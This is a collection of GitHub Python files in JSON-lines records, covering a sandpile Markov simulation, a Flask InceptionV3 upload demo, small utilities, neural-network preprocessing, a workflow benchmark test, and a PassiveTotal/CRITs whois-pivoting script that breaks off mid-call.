+{"seq_id":"42739851486","text":"\"\"\"Permet de visualiser et d'exploiter\r\nles données générées avec le processus\r\nmarkovien par le code stats_from_markov\"\"\"\r\n# from Code.V2.general import *\r\nfrom general import *\r\nimport numpy as np\r\nfrom pickle import Pickler, Unpickler\r\n\r\n\r\ndef stats_from_markov(\r\n nb_line: int = 1,\r\n nb_column: int = 1,\r\n sample: int = 1_000)\\\r\n -> tuple:\r\n \"\"\"Génère des tas de sable stable aléatoirement.\r\n Revoie la liste de fréquences des tas récurents et non récurents\"\"\"\r\n min_array = None\r\n min_weight = nb_line * nb_column * 3\r\n weight_recurrent = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n collapse_weight = np.zeros(nb_line * nb_column * 18, dtype=np.int64)\r\n loosed_weight = np.zeros(nb_line * nb_column * 3 + 1, dtype=np.int64)\r\n\r\n tas = neutral(nb_line, nb_column)\r\n weight = tas.sum()\r\n old_weight = weight\r\n adding_location = 0, 0\r\n for _ in range(sample):\r\n while tas.max() <= 3:\r\n old_weight += 1\r\n adding_location = np.random.randint(0, nb_line), np.random.randint(0, nb_column)\r\n tas[adding_location] += 1\r\n\r\n this_collapse_weight = collapse_large(tas, adding_location[0], adding_location[1]) // 4\r\n\r\n weight = tas.sum()\r\n this_loosed_weight = old_weight - weight\r\n old_weight = weight\r\n\r\n # configuration\r\n weight_recurrent[weight] += 1\r\n if weight < min_weight:\r\n min_weight = weight\r\n min_array = np.copy(tas)\r\n\r\n # collapse weight\r\n if this_collapse_weight > nb_line * nb_column * 18:\r\n raise IndexError(f\"{this_collapse_weight} est l'avalanche de trop\")\r\n else:\r\n collapse_weight[this_collapse_weight] += 1\r\n\r\n # loosed weight\r\n loosed_weight[this_loosed_weight] += 1\r\n\r\n return nb_line, nb_column, sample, weight_recurrent, min_array, collapse_weight, loosed_weight\r\n\r\n\r\ndef save_stats(nb_line, nb_column, sample):\r\n \"\"\"Save the stats\"\"\"\r\n with open(f\"Data\\Markov\\\\markov_{nb_line}_{nb_column}_{sample}\", 'wb') as file:\r\n pic = Pickler(file)\r\n pic.dump(stats_from_markov(nb_line, nb_column, sample))\r\n\r\n\r\nif __name__ == '__main__':\r\n from time import perf_counter as perf\r\n t = perf()\r\n save_stats(70, 70, 10_000_000)\r\n print(perf() - t)\r\n","repo_name":"TheoRudkiewicz/TIPE-Modele-du-tas-de-sable-abelien","sub_path":"Rectangle/Statistiques/stats_from_markov.py","file_name":"stats_from_markov.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"12065840661","text":"from flask import Flask, request, redirect, url_for, flash\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.inception_v3 import *\nfrom tensorflow.keras import backend as K\nfrom werkzeug.utils import secure_filename\n\nimport json\nimport numpy as np\nimport os\n\nUPLOAD_FOLDER = './image_sets/'\nif not os.path.exists(UPLOAD_FOLDER):\n os.mkdir(UPLOAD_FOLDER)\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef InceptV3(img):\n # Load InceptionV3 Image\n model = InceptionV3(include_top=True, weights='imagenet')\n # Resize the image\n img = image.load_img(img, target_size=(299, 299))\n # Change the image to array\n x = image.img_to_array(img)\n # Add dimension to image\n x = np.expand_dims(x, axis=0)\n # Normalize the data between 0 to 1\n x = preprocess_input(x)\n # Get prediciton\n preds = model.predict(x)\n result = dict((key, str(value)) for (_,key, value) in decode_predictions(preds)[0])\n K.clear_session()\n return json.dumps(result)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n global model\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n img = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n predict_results = InceptV3(img)\n return predict_results\n return '''\n \n Upload new File\n
Upload new File
\n \n '''\n\n@app.route('/train',methods = ['GET','POST'])\ndef training():\n if request.method == \"POST\":\n\n return \"This is inceptionV3 return\"\n return '''\n \n Training\n
Training Custom data
\n \n '''\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=5001,debug=True,threaded=False)\n","repo_name":"twcc/AI-Services","sub_path":"Tutorial_Three/inceptionv3/inference/flask_web.py","file_name":"flask_web.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"66"}
+{"seq_id":"7085289520","text":"import argparse\n\ndef get_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input')\n parser.add_argument('--mapping')\n parser.add_argument('--output')\n args = parser.parse_args()\n\n return args\n\ndef main(args):\n\n mapping = {}\n for line in open(args.mapping):\n src, tgt = line.strip().split()\n mapping[src] = tgt\n \n with open(args.output, 'w') as f:\n for line in open(args.input):\n s = ' '.join([mapping[w] for w in line.strip().split()])\n print(s, file=f)\n \nif __name__ == '__main__':\n\n args = get_args()\n main(args)","repo_name":"bearhsiang/SSLST","sub_path":"utils_new/map_hidden_unit.py","file_name":"map_hidden_unit.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"72258628371","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport re\n\n\nclass Machine:\n def __init__(self, instructions):\n self.instructions = instructions\n self.mask = 'X'\n self.memory = {}\n\n\n def apply_mask(self, value):\n mask = int(self.mask.replace('0', '1').replace('X', '0'), 2)\n overwrite = int(self.mask.replace('X', '0'), 2)\n return (overwrite & mask) | (value & (~mask))\n\n def run(self):\n for instruction in self.instructions:\n m = re.match(r\"mask = ([01X]+)\", instruction)\n if m:\n self.mask = m.group(1)\n continue\n m = re.match(r\"mem\\[(\\d+)\\] = (\\d+)\", instruction)\n if m:\n address = int(m.group(1))\n value = int(m.group(2))\n value_set = self.apply_mask(value)\n self.memory[address] = value_set\n\n\n\ndef main():\n with open(\"input\") as f:\n s = f.read()\n\n machine = Machine(s.splitlines())\n machine.run()\n result = sum(machine.memory.values())\n print(f\"Part 1: {result}\")\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fparat/adventofcode","sub_path":"2020/day14/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"11373114483","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pickle import dump\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom torch import from_numpy\nfrom cfdpinn.plots import create_animation\n\ndef preprocess(data,geom,args):\n \"\"\"\n Returns a dict holding the NumPy arrays needed for PINN training\n \"\"\"\n #Merge features x,y,t into single array in data\n data = merge_features(data,geom)\n\n #Seperate into boundary and interior arrays\n data = extract_boundaries(data)\n data = extract_interior(data)\n\n #Obtain feature scaling object\n #Note that scaling is not applied until after training \n #locations are obtained as this requires using \n #pre-scaled spatio-temporal locations\n data[\"scaler\"] = scaling_object(data)\n if args.save_scaler_path != \"\":\n dump(data[\"scaler\"], open(args.save_scaler_path, \"wb\"))\n\n #Create training locations\n data = get_training_locations(data,args)\n\n #Train-test-splitting\n data = apply_scaling(data)\n data = apply_train_test_split(data,args.test_size,scaled=True)\n\n #Make boundary arrays contiguous for PyTorch\n data = make_boundary_arrays_contiguous(data)\n\n return data\n\ndef scaling_object(data):\n \"\"\"\n Fit a standard scaler to the training data\n features and return it.\n \"\"\"\n _scaler = StandardScaler()\n scaler = _scaler.fit(data[\"features\"])\n \n return scaler\n\ndef apply_scaling(data):\n \"\"\"\n Apply the data scaler to all training locations\n to be used in PINN training\n \"\"\"\n data_labels = [\"basewall\",\"interior\",\"leftwall\",\"rightwall\"]\n for data_label in data_labels:\n data[f\"scaled_features_{data_label}\"] = \\\n data[\"scaler\"].transform(data[f\"features_{data_label}\"])\n \n return data\n\ndef get_training_locations(data,args):\n \"\"\"\n Store the index of training locations chosen\n by train test split. This allows plotting for\n future visualization.\n \"\"\"\n #First need to apply train_test_splitting to \n #replicate real train_test_split\n data = apply_train_test_split(data,args.test_size,scaled=False)\n\n #Now extract locations for all components of\n #training data arrays\n array_labels = [\"interior\",\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n data[f\"{array_label}_training_locs\"] = np.concatenate(\n (\n data[f\"t_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"y_{array_label}_train\"].flatten().reshape(-1,1),\n data[f\"x_{array_label}_train\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n data[f\"{array_label}_training_locs\"] = \\\n data[f\"{array_label}_training_locs\"][data[f\"{array_label}_training_locs\"][:,0].argsort()]\n\n return data\n\ndef apply_train_test_split(data,test_size,scaled):\n \"\"\"\n Apply train-test splitting for all training data\n arrays.\n \"\"\"\n if scaled == True:\n label = \"scaled_\"\n elif scaled == False:\n label = \"\"\n\n #Interior\n (\n data[\"x_interior_train\"],\n data[\"x_interior_test\"],\n data[\"y_interior_train\"],\n data[\"y_interior_test\"],\n data[\"t_interior_train\"],\n data[\"t_interior_test\"],\n data[\"u_interior_train\"],\n data[\"u_interior_test\"],\n data[\"v_interior_train\"],\n data[\"v_interior_test\"],\n data[\"p_interior_train\"],\n data[\"p_interior_test\"],\n ) = train_test_split(\n data[f\"{label}features_interior\"][:,2], \n data[f\"{label}features_interior\"][:,1], \n data[f\"{label}features_interior\"][:,0],\n data[\"u_interior_labels\"],\n data[\"v_interior_labels\"],\n data[\"p_interior_labels\"],\n test_size=test_size)\n\n #Basewall\n (\n data[\"x_basewall_train\"],\n data[\"x_basewall_test\"],\n data[\"y_basewall_train\"],\n data[\"y_basewall_test\"],\n data[\"t_basewall_train\"],\n data[\"t_basewall_test\"],\n data[\"u_basewall_train\"],\n data[\"u_basewall_test\"],\n data[\"v_basewall_train\"],\n data[\"v_basewall_test\"],\n data[\"p_basewall_train\"],\n data[\"p_basewall_test\"],\n ) = train_test_split(\n data[f\"{label}features_basewall\"][:,2], \n data[f\"{label}features_basewall\"][:,1], \n data[f\"{label}features_basewall\"][:,0],\n data[\"u_basewall_labels\"],\n data[\"v_basewall_labels\"],\n data[\"p_basewall_labels\"],\n test_size=test_size)\n\n #Leftwall\n (\n data[\"x_leftwall_train\"],\n data[\"x_leftwall_test\"],\n data[\"y_leftwall_train\"],\n data[\"y_leftwall_test\"],\n data[\"t_leftwall_train\"],\n data[\"t_leftwall_test\"],\n data[\"u_leftwall_train\"],\n data[\"u_leftwall_test\"],\n data[\"v_leftwall_train\"],\n data[\"v_leftwall_test\"],\n data[\"p_leftwall_train\"],\n data[\"p_leftwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_leftwall\"][:,2], \n data[f\"{label}features_leftwall\"][:,1], \n data[f\"{label}features_leftwall\"][:,0],\n data[\"u_leftwall_labels\"],\n data[\"v_leftwall_labels\"],\n data[\"p_leftwall_labels\"],\n test_size=test_size)\n\n #Rightwall\n (\n data[\"x_rightwall_train\"],\n data[\"x_rightwall_test\"],\n data[\"y_rightwall_train\"],\n data[\"y_rightwall_test\"],\n data[\"t_rightwall_train\"],\n data[\"t_rightwall_test\"],\n data[\"u_rightwall_train\"],\n data[\"u_rightwall_test\"],\n data[\"v_rightwall_train\"],\n data[\"v_rightwall_test\"],\n data[\"p_rightwall_train\"],\n data[\"p_rightwall_test\"],\n ) = train_test_split(\n data[f\"{label}features_rightwall\"][:,2], \n data[f\"{label}features_rightwall\"][:,1], \n data[f\"{label}features_rightwall\"][:,0],\n data[\"u_rightwall_labels\"],\n data[\"v_rightwall_labels\"],\n data[\"p_rightwall_labels\"],\n test_size=test_size)\n\n return data\n\ndef make_boundary_arrays_contiguous(data):\n \"\"\"\n Concatenate boundary condition arrays into a \n contiguous array to ease training of the PINN\n as all boundary arrays have the same boundary \n condition currently.\n \"\"\"\n data_components = [\"u\",\"v\",\"p\",\"x\",\"y\",\"t\"]\n train_test_components = [\"train\",\"test\"]\n\n for data_component in data_components:\n for train_test_component in train_test_components:\n data[f\"{data_component}_boundary_{train_test_component}\"] = \\\n np.concatenate((\n data[f\"{data_component}_rightwall_{train_test_component}\"],\n data[f\"{data_component}_leftwall_{train_test_component}\"],\n data[f\"{data_component}_basewall_{train_test_component}\"]\n ))\n\n return data\n\ndef extract_boundaries(data):\n \"\"\"\n Extract boundary data from U,V and P arrays\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n \n #Get boundary data labels\n data[f\"{array_label}_basewall\"] = \\\n data[f\"{array_label}\"][:,0,:]\n \n data[f\"{array_label}_leftwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,0]\n \n data[f\"{array_label}_rightwall\"] = \\\n data[f\"{array_label}\"][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n data[f\"{array_label}_basewall_labels\"] = \\\n data[f\"{array_label}_basewall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_leftwall_labels\"] = \\\n data[f\"{array_label}_leftwall\"].flatten().reshape(-1,1)\n \n data[f\"{array_label}_rightwall_labels\"] = \\\n data[f\"{array_label}_rightwall\"].flatten().reshape(-1,1)\n \n #Handling features; x,y,t spatio-temporal locations \n array_labels = [\"x\",\"y\",\"t\"]\n for array_label in array_labels:\n \n #Get boundary data features\n data[f\"basewall_features_{array_label}\"] = data[array_label][:,0,:]\n data[f\"leftwall_features_{array_label}\"] = data[array_label][:,1:-1,0]\n data[f\"rightwall_features_{array_label}\"] = data[array_label][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n array_labels = [\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n \n data[f\"features_{array_label}\"] = np.concatenate(\n (\n data[f\"{array_label}_features_t\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_y\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_x\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n return data\n\ndef extract_interior(data):\n \"\"\"\n Extract interior data from U,V and P arrays.\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n data[f\"{array_label}_interior\"] = data[array_label][:,1:-1,1:-1]\n data[f\"{array_label}_interior_labels\"] = \\\n data[f\"{array_label}_interior\"].flatten().reshape(-1,1)\n \n #Handling features; x,y,t spatio-temporal locations\n array_labels = [\"x\", \"y\", \"t\"]\n for array_label in array_labels:\n data[f\"interior_features_{array_label}\"] = data[array_label][:,1:-1,1:-1]\n\n #Reshape to column format for DL framework\n data[\"features_interior\"] = np.concatenate(\n (\n data[\"interior_features_t\"].flatten().reshape(-1,1),\n data[\"interior_features_y\"].flatten().reshape(-1,1),\n data[\"interior_features_x\"].flatten().reshape(-1,1),\n ),\n axis=1)\n \n return data\n\ndef merge_features(data,geom):\n \"\"\"\n Concatenate features together into a single array.\n \"\"\"\n data[\"y\"], data[\"t\"], data[\"x\"] = np.meshgrid(\n np.linspace(geom[\"y_start\"],geom[\"y_end\"],geom[\"numy\"]),\n np.linspace(geom[\"t_start\"],geom[\"t_end\"],geom[\"numt\"]),\n np.linspace(geom[\"x_start\"],geom[\"x_end\"],geom[\"numx\"]))\n\n #Return an array in form t, x, y\n data[\"features\"] = np.concatenate(\n (\n data[\"t\"].flatten().reshape(-1,1),\n data[\"y\"].flatten().reshape(-1,1),\n data[\"x\"].flatten().reshape(-1,1)\n ),\n axis=1)\n\n return data\n\ndef convert_to_tensors(data,device):\n \"\"\"\n Convert numpy arrays into tensors\n and ensure they reside on the correct PyTorch device\n and have the correct gradient tracking applied\n for automatic differentiation.\n \"\"\"\n geom_components = [\"interior\",\"boundary\"]\n train_test_components = [\"train\",\"test\"]\n\n for geom_component in geom_components:\n for train_test_component in train_test_components:\n\n data[f\"x_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"x_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"y_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"y_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"t_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"t_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"u_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"u_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"v_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"v_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"p_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"p_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n return data","repo_name":"harrymchugh/pinns","sub_path":"src/cfdpinn/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6476125499","text":"import random\n\nimport pytest\n\nimport covalent as ct\nfrom covalent._shared_files.util_classes import Status\n\n\n@pytest.mark.parametrize(\"iteration\", range(5))\ndef test_benchmark_primality_test(benchmark, iteration):\n run_benchmark = benchmark[0]\n logger = benchmark[1]\n\n @ct.electron\n def is_prime(n: int) -> bool:\n \"\"\"Primality test using 6k+-1 optimization.\"\"\"\n if n <= 3:\n return n > 1\n if not n % 2 or not n % 3:\n return False\n i = 5\n stop = int(n**0.5)\n while i <= stop:\n if not n % i or not n % (i + 2):\n return False\n i += 6\n return True\n\n @ct.lattice\n def primality_tests(nums_to_test):\n res = []\n for i in nums_to_test:\n entry = {}\n entry[\"num\"] = i\n entry[\"is_prime\"] = is_prime(i)\n res.append(entry)\n return res\n\n nums_to_test = [random.randint(1000, 10000) for i in range(50)]\n\n results, status = run_benchmark(iteration, primality_tests, *[nums_to_test])\n logger.debug(results.dict())\n\n assert status == Status(\"COMPLETED\")\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/stress_tests/benchmarks/cpu_intensive_workflows_test.py","file_name":"cpu_intensive_workflows_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"}
+{"seq_id":"43756574715","text":"#!/usr/bin/env python3\n\nimport argparse\nimport datetime\nimport getpass\nimport json\nimport logging\nimport logging.config\nimport os\nimport re\nimport sys\nimport tabulate\nimport uuid\n\nfrom critsapi.critsapi import CRITsAPI\nfrom critsapi.critsdbapi import CRITsDBAPI\n\nfrom lib.pt.common.config import Config\nfrom lib.pt.common.constants import PT_HOME\nfrom lib.pt.core.database import Database\nfrom lib.pt.ptapi import PTAPI\nfrom lib.crits.vocabulary.indicators import IndicatorTypes as it\nfrom operator import itemgetter\nfrom configparser import ConfigParser\n\nlog = logging.getLogger()\nVERSION = \"0.1337\"\n\n# Check configuration directory\nlocal_config_dir = os.path.join(PT_HOME, 'etc', 'local')\nif not os.path.exists(local_config_dir):\n os.makedirs(local_config_dir)\n sys.exit('No etc/local/ directory. See README to create.')\n\nconfig = Config()\n\n# Check local data directory\nif config.core.cache_enabled:\n if not os.path.exists(config.core.cache_dir):\n log.info('Creating Cache directory in '\n '{}'.format(config.core.cache_dir))\n os.makedirs(config.core.cache_dir)\n\n# Initialize loggin\nlog_path = os.path.join(PT_HOME, 'etc', 'local', 'logging.ini')\ntry:\n logging.config.fileConfig(log_path)\nexcept Exception as e:\n sys.exit('unable to load logging configuration file {}: '\n '{}'.format(log_path, str(e)))\n\npt = PTAPI(username=config.core.pt_username, apikey=config.core.pt_apikey)\npt.set_proxy(http=config.proxy.http, https=config.proxy.https)\n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('QUERY', action='store', help='A value to send as a'\n ' query to PT. Email, phone, name, etc.')\nargparser.add_argument('--dev', dest='dev', action='store_true', default=False)\nargparser.add_argument('--crits', dest='crits', action='store_true',\n default=False, help='Write the results to CRITs with'\n ' appropriate relationships.')\nargparser.add_argument('--test', dest='test', action='store_true',\n default=False, help='Run with test data. (Save PT '\n 'queries)')\nargparser.add_argument('-f', dest='force', action='store_true', default=False,\n help='Force a new API query (do not used cached '\n 'results.')\nargparser.add_argument('-t', action='append', dest='tags', default=[],\n help='Bucket list tags for crits. Multiple -t options '\n 'are allowed.')\n# Add our mutually exclusive items\nmeg = argparser.add_mutually_exclusive_group()\nmeg.add_argument('-n', dest='name', action='store_true', default=False,\n help='The query is a name and pt_query will not try to '\n 'determine the type automatically.')\nmeg.add_argument('-a', dest='address', action='store_true', default=False,\n help='The query is an address and pt_query will not '\n 'try to determine the type automatically.')\nargs = argparser.parse_args()\n\n# Patterns for determining which type of lookup to do\n# Some items cannot be differentiated via regex (name vs address), so we use\n# a flag to specify these\n# Load patterns for regexes\npattern_config = ConfigParser()\npatterns = {}\nwith open(os.path.join(PT_HOME, 'etc', 'patterns.ini')) as fp:\n pattern_config.readfp(fp)\n\nemail_address_pattern = re.compile(pattern_config.get('email', 'pattern'))\nphone_pattern = re.compile(pattern_config.get('phone', 'pattern'))\ndomain_pattern = re.compile(pattern_config.get('domain', 'pattern'))\n\ndatabase = None\nif config.core.cache_enabled:\n database = Database()\n\nif args.crits:\n HOME = os.path.expanduser(\"~\")\n if not os.path.exists(os.path.join(HOME, '.crits_api')):\n print('''Please create a file with the following contents:\n [crits]\n user = lolnate\n\n [keys]\n prod_api_key = keyhere\n dev_api_key = keyhere\n ''')\n raise SystemExit('~/.crits_api was not found or was not accessible.')\n\n crits_config = ConfigParser()\n crits_config.read(os.path.join(HOME, '.crits_api'))\n\n if crits_config.has_option(\"keys\", \"prod\"):\n crits_api_prod = crits_config.get(\"keys\", \"prod\")\n if crits_config.has_option(\"keys\", \"dev\"):\n crits_api_dev = crits_config.get(\"keys\", \"dev\")\n if crits_config.has_option(\"crits\", \"user\"):\n crits_username = crits_config.get(\"crits\", \"user\")\n\n if args.dev:\n crits_url = config.crits.crits_dev_api_url\n crits_api_key = crits_api_dev\n if len(crits_api_key) != 40:\n print(\"Dev API key in ~/.crits_api is the wrong length! Must be 40\\\n characters.\")\n else:\n crits_url = config.crits.crits_prod_api_url\n crits_api_key = crits_api_prod\n if len(crits_api_key) != 40:\n print(\"Prod API key in ~/.crits_api is the wrong length! Must be 40\\\n characters.\")\n\n crits_proxy = {\n 'http': config.crits.crits_proxy_url,\n 'https': config.crits.crits_proxy_url,\n }\n\n # Build our mongo connection\n if args.dev:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri_dev,\n db_name=config.crits.database)\n else:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri,\n db_name=config.crits.database)\n crits_mongo.connect()\n # Connect to the CRITs API\n crits = CRITsAPI(\n api_url=crits_url,\n api_key=crits_api_key,\n username=crits_username,\n proxies=crits_proxy,\n verify=config.crits.crits_verify\n )\n\nquery = args.QUERY.rstrip()\n# Get the user launching all this\nuser = getpass.getuser()\n\n# Used to store the type of indicator in CRITs for the query object.\ncrits_indicator_type = ''\n\n# Used to store the cache file location\ncache_file = None\n\nif database and not args.force and config.core.cache_enabled:\n cache_file = database.get_cache_file(query)\n if cache_file:\n log.info('Using cache file for query {}'.format(query))\n with open(cache_file) as fp:\n results = json.loads(fp.read())\n\nbucket_list = ['whois', 'pt:query']\nfor t in args.tags:\n bucket_list.append(t)\n\nif args.name or args.address:\n if args.name:\n field_str = 'name'\n if args.address:\n field_str = 'address'\n if args.test:\n results = pt.get_test_results(field=field_str)\n else:\n results = pt.whois_search(query=query, field=field_str)\n\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/'\\\n '{}'.format(field_str)\n # Use our config defined indicator type of whois email objects\n if args.name:\n crits_indicator_type = it.WHOIS_NAME\n if args.address:\n crits_indicator_type = it.WHOIS_ADDR1\n\n bucket_list.append('registrant')\n\nelif re.match(email_address_pattern, query):\n if args.test:\n results = pt.get_test_results(field='email')\n else:\n results = pt.whois_search(query=query, field='email')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/email'\n # Use our config defined indicator type of whois email objects\n crits_indicator_type = it.WHOIS_REGISTRANT_EMAIL_ADDRESS\n bucket_list.append('registrant')\n\nelif re.match(phone_pattern, query):\n if args.test:\n results = pt.get_test_results(field='phone')\n else:\n results = pt.whois_search(query=query, field='phone')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/phone'\n crits_indicator_type = it.WHOIS_TELEPHONE\n bucket_list.append('registrant')\n\nelif re.match(domain_pattern, query):\n if args.test:\n results = pt.get_test_results(field='domain')\n else:\n results = pt.whois_search(query=query, field='domain')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/domain'\n crits_indicator_type = it.DOMAIN\n\nelse:\n raise SystemExit(\"Your query didn't match a known pattern.\")\n\n# Add the query to CRITs regardless of the number of results\n# TODO: Add campaigns\nif args.crits:\n found = False\n # Search for it with raw mongo because API is slow\n crits_result = crits_mongo.find('indicators', {'value': query, 'type':\n crits_indicator_type})\n if crits_result.count() > 0:\n for r in crits_result:\n if r['value'] == query:\n indicator = r\n found = True\n if not found:\n indicator = crits.add_indicator(\n value=query,\n itype=crits_indicator_type,\n source=config.crits.default_source,\n reference='Added via pt_query.py',\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence='low',\n indicator_impact='low',\n description='Queried with pt_query.py',\n )\n\n # This is pretty hacky - Since we use both the raw DB and the API, we might\n # receive either an '_id' or an 'id' back. We are going to standardize on\n # 'id', rather than '_id'\n if 'id' not in indicator:\n if '_id' not in indicator:\n print(repr(indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in new indicator'.format(query))\n else:\n indicator['id'] = indicator['_id']\n\n# Iterate through all results and print/add to CRITs (if args provided)\nformatted_results = []\nfor result in results['results']:\n if 'domain' in result:\n crits_indicators_to_add = []\n # Row contains:\n # Domain, Registrant Email, Registrant Name, Registrant Date,\n # Expiration Date, Tags\n row = ['', '', '', '', '', '']\n row[0] = result['domain']\n # Email address used to register\n if 'registrant' in result:\n # Append the registrant email\n if 'email' in result['registrant']:\n row[1] = result['registrant']['email']\n email_obj = {\n 'value': result['registrant']['email'],\n 'type': it.WHOIS_REGISTRANT_EMAIL_ADDRESS,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(email_obj)\n if 'name' in result['registrant']:\n row[2] = result['registrant']['name']\n name_obj = {\n 'value': result['registrant']['name'],\n 'type': it.WHOIS_NAME,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(name_obj)\n if 'telephone' in result['registrant']:\n row[3] = result['registrant']['telephone']\n phone_obj = {\n 'value': result['registrant']['telephone'],\n 'type': it.WHOIS_TELEPHONE,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(phone_obj)\n if 'street' in result['registrant']:\n addr1_obj = {\n 'value': result['registrant']['street'],\n 'type': it.WHOIS_ADDR1,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(addr1_obj)\n\n # Date the domain was registered\n if 'registered' in result:\n row[4] = result['registered']\n if 'expiresAt' in result:\n row[5] = result['expiresAt']\n formatted_results.append(row)\n # TODO: Tags. They appear to be an extra API query which is annoying\n\n reference = '{0}/{1}'.format(base_reference, query)\n\n if args.crits:\n # Let's try getting the confidence and impact from the parent whois\n # indicator\n confidence = 'low'\n impact = 'low'\n if 'confidence' in indicator:\n if 'rating' in indicator['confidence']:\n confidence = indicator['confidence']['rating']\n if 'impact' in indicator:\n if 'rating' in indicator['impact']:\n impact = indicator['impact']['rating']\n # If not in CRITs, add all the associated indicators\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n new_ind = crits.add_indicator(\n value=result['domain'],\n itype=it.DOMAIN,\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # The CRITs API allows us to add a campaign to the indicator, but\n # not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n 